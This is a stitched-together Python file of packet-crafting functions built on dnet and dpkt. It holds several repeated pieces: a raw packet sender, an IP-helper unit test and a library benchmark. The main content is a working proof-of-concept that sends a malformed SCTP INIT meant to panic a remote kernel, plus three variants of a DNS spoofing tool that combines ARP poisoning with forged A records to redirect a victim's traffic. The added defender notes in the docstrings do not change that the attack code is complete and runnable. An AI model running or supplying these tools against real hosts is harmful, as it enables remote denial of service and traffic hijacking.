def Send(self):
    """Push every packet in ``self.packets`` out through a raw IP handle.

    Each packet is serialised with ``str()``, passed through
    ``dnet.ip_checksum`` so the checksum fields are filled in, and handed to
    ``dnet.ip().send``.

    NOTE(review): ``str(pkt)`` presumably yields wire bytes only on
    Python 2 -- confirm the target interpreter before reuse.
    NOTE(review): the page lost the original indentation; the 100 ms pause
    is assumed to sit inside the loop (one pause per packet).
    """
    raw_ip = dnet.ip()
    for packet in self.packets:
        wire = dnet.ip_checksum(str(packet))
        raw_ip.send(wire)
        # Pace the transmissions instead of bursting them onto the link.
        time.sleep(0.10)
def run(self):
    """Send ``self.ip`` at every TTL below ``MAX_HOPS`` for each sequence step.

    The outer loop runs ``SEQ_DELTA`` times and bumps ``self.tcp.seq`` by the
    loop counter, so the increments accumulate (+1, +2, +3, ...). The inner
    loop sets both the IP id and the TTL to the hop index, re-checksums the
    serialised packet and writes it to ``self.sock``.

    NOTE(review): ``self.tcp`` is presumably the payload of ``self.ip``;
    nothing visible here links them -- confirm in the constructor.
    NOTE(review): the page lost the original indentation; the 1 ms pause is
    assumed to be per packet, inside the inner loop.
    """
    for step in xrange(1, SEQ_DELTA + 1):
        self.tcp.seq += step
        for hop in xrange(MAX_HOPS):
            # TTL 0 is included because the range starts at zero.
            self.ip.id = hop
            self.ip.ttl = hop
            self.sock.send(dnet.ip_checksum(str(self.ip)))
            time.sleep(0.001)
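def test_ip_misc(self):
    """Check address conversion, IPv4 header packing and header checksumming.

    Three things are pinned:

    * ``ip_ntoa`` / ``ip_aton`` round-trip between the packed and the
      dotted form of 1.2.3.4.
    * ``ip_pack_hdr`` produces a 20-byte header with the checksum field
      still zero. Read against the expected bytes, the positional arguments
      are tos=0, len=20, id=666 (0x029a), off=0, ttl=255, proto=UDP, then
      source and destination.
    * ``ip_checksum`` fills the checksum field with 0xa92b, the one's
      complement of the folded 16-bit sum over the header words.

    Uses ``assertEqual`` rather than ``failUnless(x == y)`` and bare
    ``assert``: ``failUnless`` is a deprecated alias that newer unittest
    releases removed, bare asserts vanish under ``python -O``, and
    ``assertEqual`` prints both values on failure.
    """
    packed_src = '\x01\x02\x03\x04'
    dotted_src = '1.2.3.4'
    self.assertEqual(dnet.ip_ntoa(packed_src), dotted_src)
    self.assertEqual(dnet.ip_aton(dotted_src), packed_src)

    packed_dst = '\x05\x06\x07\x08'
    hdr = dnet.ip_pack_hdr(0, dnet.IP_HDR_LEN, 666, 0, 255,
                           dnet.IP_PROTO_UDP, packed_src, packed_dst)
    # Bytes 10-11 (the header checksum) are still zero at this point.
    self.assertEqual(
        hdr,
        'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08')

    hdr = dnet.ip_checksum(hdr)
    # Only the checksum bytes may change: 00 00 -> a9 2b ('\xa9+').
    self.assertEqual(
        hdr,
        'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\xa9+\x01\x02\x03\x04\x05\x06\x07\x08')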
def main():
    """Send one crafted SCTP INIT to ``host:port`` (proof-of-concept driver).

    Command line: ``<host> <port>``. ``usage``, ``err`` and ``msg`` are
    defined elsewhere in the file; ``usage`` and ``err`` presumably exit,
    since execution would otherwise continue with unset names -- confirm.

    What the packet contains, read against the SCTP INIT chunk layout: a
    fixed 16-byte INIT body followed by 20 copies of the 8-byte TLV
    ``c0 ff 00 08 ff ff ff ff`` (parameter type 0xc0ff, length 8). The page
    does not name the affected stack, version or advisory.

    Defender notes: the receiving side is protected by a patched SCTP
    implementation, or by filtering the SCTP IP protocol at the perimeter
    where it is not used. On the wire the packet is recognisable as an INIT
    chunk carrying a run of identical parameters of an unassigned type.

    NOTE(review): Python 2 only (backtick repr, ``xrange``, ``str`` used as
    bytes). The closing message is printed unconditionally; nothing here
    checks the remote host's state.
    """
    if len(sys.argv) != 3: usage()
    host = sys.argv[1]
    # int() raises ValueError on a non-numeric port; no range check follows.
    port = int(sys.argv[2])
    try:
        # Raw IP handle for sending, interface table for source selection.
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')
    dst_addr = socket.gethostbyname(host)
    # Pick the local address of the interface that routes to the destination.
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip
    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
    # INIT body; field names below follow the SCTP INIT layout by position.
    invalid = ''
    invalid += '\x20\x10\x11\x73'  # initiate tag
    invalid += '\x00\x00\xf4\x00'  # advertised receiver window
    invalid += '\x00\x05'  # outbound streams
    invalid += '\x00\x05'  # inbound streams
    invalid += '\x20\x10\x11\x73'  # initial TSN
    # 20 identical TLVs: type 0xc0ff, length 8, value ff ff ff ff.
    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    # Length is taken after the data is attached so it covers the whole chunk.
    init.len = len(init)
    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [init]
    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    # Same ordering rule as the chunk: total length after the payload is set.
    ip.len = len(ip)
    # Backticks are Python 2 shorthand for repr(); dumps the packet for the operator.
    print ` ip `
    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)
    msg('kernel should have panicked on remote host %s' % (dst_addr))
def main():
    """Build and send a single malformed SCTP INIT to the host given on argv.

    Expects exactly two arguments, ``<host> <port>``. The helpers ``usage``,
    ``err`` and ``msg`` live elsewhere in the file; ``usage`` and ``err``
    presumably terminate the process -- confirm.

    Packet shape, interpreted by position against the SCTP INIT chunk
    format: 16 bytes of fixed INIT fields, then the 8-byte TLV
    ``c0 ff 00 08 ff ff ff ff`` repeated 20 times (type 0xc0ff, length 8).
    No affected kernel, version or advisory is named on the page.

    Defender notes: a patched SCTP stack, or dropping the SCTP IP protocol
    at the edge where the protocol is unused, removes the exposure. A
    monitoring rule can match INIT chunks that carry many repeated
    parameters of one unassigned type.

    NOTE(review): Python 2 only (backtick repr, ``xrange``, byte strings as
    ``str``). The final message is emitted whether or not anything happened
    on the remote side.
    """
    if len(sys.argv) != 3: usage()
    host = sys.argv[1]
    # ValueError here on a non-numeric port; the value is not range-checked.
    port = int(sys.argv[2])
    try:
        # dnet.ip() opens the raw IP sender; dnet.intf() the interface table.
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')
    dst_addr = socket.gethostbyname(host)
    # Source address = address of the interface used to reach the destination.
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip
    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
    # Fixed INIT fields, named by their position in the SCTP INIT layout.
    invalid = ''
    invalid += '\x20\x10\x11\x73'  # initiate tag
    invalid += '\x00\x00\xf4\x00'  # advertised receiver window
    invalid += '\x00\x05'  # outbound streams
    invalid += '\x00\x05'  # inbound streams
    invalid += '\x20\x10\x11\x73'  # initial TSN
    # Trailing parameters: the same 8-byte TLV appended 20 times.
    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    # Computed after the data assignment so the length includes it.
    init.len = len(init)
    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]
    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    # Total length is likewise set only once the SCTP payload is attached.
    ip.len = len(ip)
    # Python 2 backtick repr: prints the assembled packet before sending.
    print `ip`
    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)
    msg('kernel should have panicked on remote host %s' % (dst_addr))
def dns_spoof(dev, source_mac, source, target=None, host=None, redirection=None):
    """Answer captured DNS A queries for ``host`` with ``redirection``'s address.

    Steps visible in the body: resolve ``redirection``, open a raw IP
    handle, start ``poison`` (defined elsewhere; presumably ARP poisoning
    that places this machine between ``source`` and ``target`` -- confirm)
    in a daemon thread, then capture ``udp dst port 53`` on ``dev``. Every
    captured packet that is a plain single-question IN/A query for ``host``
    is rewritten in place into a response and sent back to the querier.

    Args:
        dev: capture interface name, passed to ``pcap.pcap``.
        source_mac, source: forwarded unchanged to ``poison``.
        target: client address; added to the capture filter as ``src``.
            Defaults to None, but the banner concatenates it into a string,
            so None raises TypeError before any capture starts.
        host: query name to match exactly (same TypeError caveat).
        redirection: name or address placed in the forged A record.

    Defender notes: the reply is built from the captured query, so it keeps
    the query's transaction id and mirrors its address/port pairs; at the
    UDP layer it looks like the resolver's answer. DNSSEC validation,
    encrypted transport to the resolver and switch-level ARP inspection
    remove the preconditions. A visible symptom is two answers to one
    query id carrying different A records.

    NOTE(review): the page lost the original indentation; the nesting below,
    including the cleanup call inside the ``except`` block, is reconstructed.
    ``G``, ``W`` and ``R`` are presumably terminal colour codes.
    """
    redirection = gethostbyname(redirection)
    sock = dnet.ip()
    pcap_filter = 'udp dst port 53'
    if target: pcap_filter += ' and src %s' % target
    print('[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W)
    # Background daemon thread that keeps running poison() while we capture.
    thread = Thread(target=poison, args=( dev, source_mac, source, target, 2, ))
    thread.daemon = True
    thread.start()
    pc = pcap.pcap(dev)
    pc.setfilter(pcap_filter)
    print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W)
    try:
        for ts, pkt in pc:
            # Peel Ethernet -> IP -> UDP -> DNS; no error handling around parsing.
            eth = dpkt.ethernet.Ethernet(pkt)
            ip = eth.data
            udp = ip.data
            dns = dpkt.dns.DNS(udp.data)
            # Accept only a standard query with one question and no other records.
            if dns.qr != dpkt.dns.DNS_Q: continue
            if dns.opcode != dpkt.dns.DNS_QUERY: continue
            if len(dns.qd) != 1: continue
            if len(dns.an) != 0: continue
            if len(dns.ns) != 0: continue
            if dns.qd[0].cls != dpkt.dns.DNS_IN: continue
            if dns.qd[0].type != dpkt.dns.DNS_A: continue
            # Exact string match on the queried name.
            if dns.qd[0].name != host: continue
            # Turn the parsed query into a response; dpkt keeps the DNS flags
            # word in `op`, so this resets it to RA before rcode/qr are set.
            dns.op = dpkt.dns.DNS_RA
            dns.rcode = dpkt.dns.DNS_RCODE_NOERR
            dns.qr = dpkt.dns.DNS_R
            # Single IN/A answer record carrying the redirection address.
            arr = dpkt.dns.DNS.RR()
            arr.cls = dpkt.dns.DNS_IN
            arr.type = dpkt.dns.DNS_A
            arr.name = host
            arr.ip = dnet.addr(redirection).ip
            # arr.ip = '\x4D\xEE\xB8\x96'
            dns.an.append(arr)
            # Mirror ports and addresses so the packet travels back to the querier.
            udp.sport, udp.dport = udp.dport, udp.sport
            ip.src, ip.dst = ip.dst, ip.src
            udp.data = dns
            udp.ulen = len(udp)
            ip.len = len(ip)
            # After the swap ip.src is the server the client originally queried.
            print(inet_ntoa(ip.src))
            buf = dnet.ip_checksum(str(ip))
            sock.send(buf)
    except KeyboardInterrupt:
        print('[+] DNS spoofing interrupted\n\r')
        # Turns IP forwarding back off on exit (helper defined elsewhere).
        utils.set_ip_forward(0)
def dns_spoof(self, host=None, redirection=None):
    """Reply to captured DNS A queries for ``host`` with ``redirection``'s address.

    Visible flow: build a capture filter through ``self._build_pcap_filter``
    (defined elsewhere; presumably appends the target address or addresses
    -- confirm), resolve ``redirection``, open a raw IP handle, start
    ``self.poison`` in a daemon thread, then capture on ``self.dev``. Each
    packet that is a single-question IN/A query for ``host`` is rewritten in
    place into a response and sent back.

    Args:
        host: query name to match exactly. Defaults to None, but it is
            concatenated into the banner, so None raises TypeError.
        redirection: name or address used in the forged A record; passed to
            ``gethostbyname`` first.

    Defender notes: the forged reply is derived from the captured query, so
    the transaction id and the mirrored address/port pairs match what the
    client expects. DNSSEC validation, encrypted transport to the resolver
    and ARP inspection on the switch remove the preconditions. On the wire,
    look for two answers to one query id with different A records.

    NOTE(review): the page lost the original indentation; nesting, including
    the two cleanup calls inside ``except``, is reconstructed. ``self.poison``
    and ``self.restore`` are presumably ARP poisoning and its undo -- confirm.
    """
    pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
    redirection = gethostbyname(redirection)
    sock = dnet.ip()
    # self.target may be one address or a list of them; the banner handles both.
    print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W + ' and ' + R + (','.join(self.target) if isinstance(self.target, list ) else self.target) + W + '\n')
    # Background daemon thread that keeps running self.poison while we capture.
    poison_thread = Thread(target=self.poison, args=(2, ))
    poison_thread.daemon = True
    poison_thread.start()
    packets = pcap.pcap(self.dev)
    packets.setfilter(pcap_filter)
    print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + (','.join(self.target) if isinstance(self.target, list ) else self.target) + W)
    try:
        for _, pkt in packets:
            # Peel Ethernet -> IP -> UDP -> DNS; parsing errors are not caught.
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            udp = ip_packet.data
            dns = dpkt.dns.DNS(udp.data)
            # Accept only a standard query with one question and no other records.
            if dns.qr != dpkt.dns.DNS_Q: continue
            if dns.opcode != dpkt.dns.DNS_QUERY: continue
            if len(dns.qd) != 1: continue
            if len(dns.an) != 0: continue
            if len(dns.ns) != 0: continue
            if dns.qd[0].cls != dpkt.dns.DNS_IN: continue
            if dns.qd[0].type != dpkt.dns.DNS_A: continue
            # Exact string match on the queried name.
            if dns.qd[0].name != host: continue
            # Convert the parsed query into a response; dpkt keeps the DNS
            # flags word in `op`, reset here before rcode/qr are set.
            dns.op = dpkt.dns.DNS_RA
            dns.rcode = dpkt.dns.DNS_RCODE_NOERR
            dns.qr = dpkt.dns.DNS_R
            # Single IN/A answer record carrying the redirection address.
            arr = dpkt.dns.DNS.RR()
            arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
            arr.ip = dnet.addr(redirection).ip
            dns.an.append(arr)
            # Mirror ports and addresses so the packet travels back to the querier.
            udp.sport, udp.dport = udp.dport, udp.sport
            ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
            udp.data, udp.ulen = dns, len(udp)
            ip_packet.len = len(ip_packet)
            # After the swap, src is the server the client originally queried.
            print(inet_ntoa(ip_packet.src))
            buf = dnet.ip_checksum(str(ip_packet))
            sock.send(buf)
    except KeyboardInterrupt:
        print('[+] DNS spoofing interrupted\n\r')
        # Cleanup on Ctrl-C: undo via self.restore, then IP forwarding off.
        self.restore(2)
        utils.set_ip_forward(0)
def dns_spoof(dev, source_mac, source, target = None, host = None, redirection = None):
    """Answer captured DNS A queries for ``host`` with ``redirection``'s address.

    Python 2 variant (print statements). Visible flow: resolve
    ``redirection``, open a raw IP handle, run ``poison`` (defined elsewhere;
    presumably ARP poisoning between ``source`` and ``target`` -- confirm)
    in a daemon thread, capture ``udp dst port 53`` on ``dev`` and rewrite
    each matching single-question IN/A query into a response.

    Args:
        dev: capture interface name, passed to ``pcap.pcap``.
        source_mac, source: forwarded unchanged to ``poison``.
        target: client address; added to the capture filter as ``src``.
            Defaults to None, but the banner concatenates it, so None
            raises TypeError.
        host: query name to match exactly (same TypeError caveat).
        redirection: name or address placed in the forged A record.

    Defender notes: the forged reply keeps the captured query's transaction
    id and mirrors its address/port pairs. DNSSEC validation, encrypted
    transport to the resolver and switch-level ARP inspection remove the
    preconditions. Two answers to one query id with different A records is
    the on-wire symptom.

    NOTE(review): the page lost the original indentation; nesting, including
    the cleanup call inside the outer ``except``, is reconstructed. The local
    name ``filter`` shadows the builtin for the rest of the function.
    """
    redirection = gethostbyname(redirection)
    sock = dnet.ip()
    filter = 'udp dst port 53'
    if target: filter += ' and src %s' % target
    print '[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W
    # Background daemon thread that keeps running poison() while we capture.
    thread = Thread(target = poison, args = (dev, source_mac, source, target, 2, ))
    thread.daemon = True
    thread.start()
    pc = pcap.pcap(dev)
    pc.setfilter(filter)
    print '[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W
    try:
        for ts, pkt in pc:
            # Peel Ethernet -> IP -> UDP -> DNS; parsing errors are not caught.
            eth = dpkt.ethernet.Ethernet(pkt)
            ip = eth.data
            udp = ip.data
            dns = dpkt.dns.DNS(udp.data)
            # Accept only a standard query with one question and no other records.
            if dns.qr != dpkt.dns.DNS_Q: continue
            if dns.opcode != dpkt.dns.DNS_QUERY: continue
            if len(dns.qd) != 1: continue
            if len(dns.an) != 0: continue
            if len(dns.ns) != 0: continue
            if dns.qd[0].cls != dpkt.dns.DNS_IN: continue
            if dns.qd[0].type != dpkt.dns.DNS_A: continue
            # Exact string match on the queried name.
            if dns.qd[0].name != host: continue
            # Convert the parsed query into a response; dpkt keeps the DNS
            # flags word in `op`, reset here before rcode/qr are set.
            dns.op = dpkt.dns.DNS_RA
            dns.rcode = dpkt.dns.DNS_RCODE_NOERR
            dns.qr = dpkt.dns.DNS_R
            # Single IN/A answer record carrying the redirection address.
            arr = dpkt.dns.DNS.RR()
            arr.cls = dpkt.dns.DNS_IN
            arr.type = dpkt.dns.DNS_A
            arr.name = host
            arr.ip = dnet.addr(redirection).ip
            # arr.ip = '\x4D\xEE\xB8\x96'
            dns.an.append(arr)
            # Mirror ports and addresses so the packet travels back to the querier.
            udp.sport, udp.dport = udp.dport, udp.sport
            ip.src, ip.dst = ip.dst, ip.src
            udp.data = dns
            udp.ulen = len(udp)
            ip.len = len(ip)
            # After the swap ip.src is the server the client originally queried.
            print inet_ntoa(ip.src)
            buf = dnet.ip_checksum(str(ip))
            try:
                sock.send(buf)
            # Bare except: send failures are dropped silently, and on Python 2
            # a KeyboardInterrupt raised during send() is swallowed here too.
            except:
                pass
    except KeyboardInterrupt:
        print '[+] DNS spoofing interrupted\n\r'
        # Turns IP forwarding back off on exit (helper defined elsewhere).
        set_ip_forward(0)
def compare_create(cnt):
    """Time how fast six packet libraries build one small UDP/IP datagram.

    Every section constructs a 1.2.3.4 -> 5.6.7.8 UDP packet carrying
    'hello world' ``cnt`` times and prints packets per second. Rates recorded
    by the original author:

    dpkt: 14915.2445937 pps
    dpkt (manual): 15494.3632903 pps
    impacket: 3929.30572776 pps
    openbsd.packet: 1503.7928579 pps
    scapy: 348.449269721 pps
    xstruct: 88314.8953732 pps

    The sections are not strictly like-for-like: only the dpkt and xstruct
    variants call ``dnet.ip_checksum``; the others rely on their library's
    own finaliser (``get_packet``, ``finalise``/``getRaw``, ``build``).
    """
    src = dnet.addr('1.2.3.4').ip
    dst = dnet.addr('5.6.7.8').ip
    data = 'hello world'

    def report(label, began):
        # Rate = packets built / elapsed wall-clock seconds.
        print(label, cnt / (time.time() - began), 'pps')

    # dpkt with the UDP object nested inside the IP object.
    began = time.time()
    for _ in range(cnt):
        nested = dpkt.ip.IP(
            src=src, dst=dst, p=dnet.IP_PROTO_UDP,
            len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data),
            data=dpkt.udp.UDP(sport=111, dport=222,
                              ulen=dnet.UDP_HDR_LEN + len(data),
                              data=data))
        dnet.ip_checksum(str(nested))
    report('dpkt:', began)

    # dpkt headers serialised separately and concatenated by hand.
    began = time.time()
    for _ in range(cnt):
        ip_hdr = dpkt.ip.IP(
            src=src, dst=dst, p=dnet.IP_PROTO_UDP,
            len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data))
        udp_hdr = dpkt.udp.UDP(
            sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data))
        dnet.ip_checksum(str(ip_hdr) + str(udp_hdr) + data)
    report('dpkt (manual):', began)

    began = time.time()
    for _ in range(cnt):
        outer = ImpactPacket.IP()
        outer.set_ip_src('1.2.3.4')
        outer.set_ip_dst('5.6.7.8')
        inner = ImpactPacket.UDP()
        inner.set_uh_sport(111)
        inner.set_uh_dport(222)
        inner.contains(ImpactPacket.Data(data))
        outer.contains(inner)
        outer.get_packet()
    report('impacket:', began)

    began = time.time()
    for _ in range(cnt):
        built = packet.createPacket(packet.IP, packet.UDP)
        built['ip'].src = '1.2.3.4'
        built['ip'].dst = '5.6.7.8'
        built['udp'].sport = 111
        # NOTE(review): 22 here versus 222 in every other section -- looks
        # like a typo in the benchmark; kept as found.
        built['udp'].dport = 22
        built['udp'].payload = data
        built.finalise()
        built.getRaw()
    report('openbsd.packet:', began)

    began = time.time()
    for _ in range(cnt):
        layered = (scapy.IP(src='1.2.3.4', dst='5.6.7.8')
                   / scapy.UDP(sport=111, dport=222)
                   / data)
        layered.build()
    report('scapy:', began)

    # xip / xudp are header classes defined elsewhere in the file.
    began = time.time()
    for _ in range(cnt):
        udp_hdr = xudp()
        udp_hdr.sport = 111
        udp_hdr.dport = 222
        udp_hdr.ulen = dnet.UDP_HDR_LEN + len(data)
        ip_hdr = xip()
        ip_hdr.src = src
        ip_hdr.dst = dst
        ip_hdr.p = dnet.IP_PROTO_UDP
        ip_hdr.len = dnet.IP_HDR_LEN + udp_hdr.ulen
        dnet.ip_checksum(str(ip_hdr) + str(udp_hdr) + data)
    report('xstruct:', began)
def compare_create(cnt):
    """Benchmark packet construction across six libraries and print the rates.

    Each section builds a 1.2.3.4 -> 5.6.7.8 UDP datagram with the payload
    'hello world' ``cnt`` times, then prints the achieved packets per second.
    Figures the original author recorded:

    dpkt: 14915.2445937 pps
    dpkt (manual): 15494.3632903 pps
    impacket: 3929.30572776 pps
    openbsd.packet: 1503.7928579 pps
    scapy: 348.449269721 pps
    xstruct: 88314.8953732 pps

    The work measured differs per section: ``dnet.ip_checksum`` is called
    only in the dpkt and xstruct variants, while impacket, openbsd.packet
    and scapy use their own ``get_packet``, ``finalise``/``getRaw`` and
    ``build`` calls.
    """
    src = dnet.addr('1.2.3.4').ip
    dst = dnet.addr('5.6.7.8').ip
    data = 'hello world'

    def report(label, began):
        # Rate = packets built / elapsed wall-clock seconds.
        print(label, cnt / (time.time() - began), 'pps')

    # dpkt, UDP carried as the IP object's data attribute.
    began = time.time()
    for _ in range(cnt):
        nested = dpkt.ip.IP(
            src=src, dst=dst, p=dnet.IP_PROTO_UDP,
            len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data),
            data=dpkt.udp.UDP(sport=111, dport=222,
                              ulen=dnet.UDP_HDR_LEN + len(data),
                              data=data))
        dnet.ip_checksum(str(nested))
    report('dpkt:', began)

    # dpkt, headers serialised one by one and joined with the payload.
    began = time.time()
    for _ in range(cnt):
        ip_hdr = dpkt.ip.IP(
            src=src, dst=dst, p=dnet.IP_PROTO_UDP,
            len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data))
        udp_hdr = dpkt.udp.UDP(
            sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data))
        dnet.ip_checksum(str(ip_hdr) + str(udp_hdr) + data)
    report('dpkt (manual):', began)

    began = time.time()
    for _ in range(cnt):
        outer = ImpactPacket.IP()
        outer.set_ip_src('1.2.3.4')
        outer.set_ip_dst('5.6.7.8')
        inner = ImpactPacket.UDP()
        inner.set_uh_sport(111)
        inner.set_uh_dport(222)
        inner.contains(ImpactPacket.Data(data))
        outer.contains(inner)
        outer.get_packet()
    report('impacket:', began)

    began = time.time()
    for _ in range(cnt):
        built = packet.createPacket(packet.IP, packet.UDP)
        built['ip'].src = '1.2.3.4'
        built['ip'].dst = '5.6.7.8'
        built['udp'].sport = 111
        # NOTE(review): destination port is 22 here but 222 in the other
        # sections -- probably a typo in the benchmark; left unchanged.
        built['udp'].dport = 22
        built['udp'].payload = data
        built.finalise()
        built.getRaw()
    report('openbsd.packet:', began)

    began = time.time()
    for _ in range(cnt):
        layered = (scapy.IP(src='1.2.3.4', dst='5.6.7.8')
                   / scapy.UDP(sport=111, dport=222)
                   / data)
        layered.build()
    report('scapy:', began)

    # xip / xudp are header classes defined elsewhere in the file.
    began = time.time()
    for _ in range(cnt):
        udp_hdr = xudp()
        udp_hdr.sport = 111
        udp_hdr.dport = 222
        udp_hdr.ulen = dnet.UDP_HDR_LEN + len(data)
        ip_hdr = xip()
        ip_hdr.src = src
        ip_hdr.dst = dst
        ip_hdr.p = dnet.IP_PROTO_UDP
        ip_hdr.len = dnet.IP_HDR_LEN + udp_hdr.ulen
        dnet.ip_checksum(str(ip_hdr) + str(udp_hdr) + data)
    report('xstruct:', began)
def dns_spoof(self, host=None, redirection=None):
    """Reply to captured DNS A queries for ``host`` with ``redirection``'s address.

    Visible flow: obtain a capture filter from ``self._build_pcap_filter``
    (defined elsewhere; presumably appends the target address or addresses
    -- confirm), resolve ``redirection``, open a raw IP handle, start
    ``self.poison`` in a daemon thread and capture on ``self.dev``. A packet
    that parses as a single-question IN/A query for ``host`` is rewritten in
    place into a response and sent back.

    Args:
        host: query name to match exactly. Defaults to None, but the banner
            concatenates it into a string, so None raises TypeError.
        redirection: name or address for the forged A record; resolved with
            ``gethostbyname`` first.

    Defender notes: because the reply is built from the captured query, it
    carries the same transaction id and mirrored address/port pairs.
    DNSSEC validation, encrypted transport to the resolver and ARP
    inspection on the switch remove the preconditions. Two answers to one
    query id with different A records is the observable symptom.

    NOTE(review): the page lost the original indentation; nesting, including
    both cleanup calls inside ``except``, is reconstructed. ``self.poison``
    and ``self.restore`` are presumably ARP poisoning and its undo -- confirm.
    """
    pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
    redirection = gethostbyname(redirection)
    sock = dnet.ip()
    # self.target may be a single address or a list; the banner handles both.
    print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W + ' and ' + R + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
    # Background daemon thread that keeps running self.poison while we capture.
    poison_thread = Thread(target=self.poison, args=(2, ))
    poison_thread.daemon = True
    poison_thread.start()
    packets = pcap.pcap(self.dev)
    packets.setfilter(pcap_filter)
    print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + (','.join(self.target) if isinstance(self.target, list) else self.target) + W)
    try:
        for _, pkt in packets:
            # Peel Ethernet -> IP -> UDP -> DNS; parsing errors are not caught.
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            udp = ip_packet.data
            dns = dpkt.dns.DNS(udp.data)
            # Accept only a standard query with one question and no other records.
            if dns.qr != dpkt.dns.DNS_Q: continue
            if dns.opcode != dpkt.dns.DNS_QUERY: continue
            if len(dns.qd) != 1: continue
            if len(dns.an) != 0: continue
            if len(dns.ns) != 0: continue
            if dns.qd[0].cls != dpkt.dns.DNS_IN: continue
            if dns.qd[0].type != dpkt.dns.DNS_A: continue
            # Exact string match on the queried name.
            if dns.qd[0].name != host: continue
            # Convert the parsed query into a response; dpkt keeps the DNS
            # flags word in `op`, reset here before rcode/qr are set.
            dns.op = dpkt.dns.DNS_RA
            dns.rcode = dpkt.dns.DNS_RCODE_NOERR
            dns.qr = dpkt.dns.DNS_R
            # Single IN/A answer record carrying the redirection address.
            arr = dpkt.dns.DNS.RR()
            arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
            arr.ip = dnet.addr(redirection).ip
            dns.an.append(arr)
            # Mirror ports and addresses so the packet travels back to the querier.
            udp.sport, udp.dport = udp.dport, udp.sport
            ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
            udp.data, udp.ulen = dns, len(udp)
            ip_packet.len = len(ip_packet)
            # After the swap, src is the server the client originally queried.
            print(inet_ntoa(ip_packet.src))
            buf = dnet.ip_checksum(str(ip_packet))
            sock.send(buf)
    except KeyboardInterrupt:
        print('[+] DNS spoofing interrupted\n\r')
        # Cleanup on Ctrl-C: undo via self.restore, then IP forwarding off.
        self.restore(2)
        utils.set_ip_forward(0)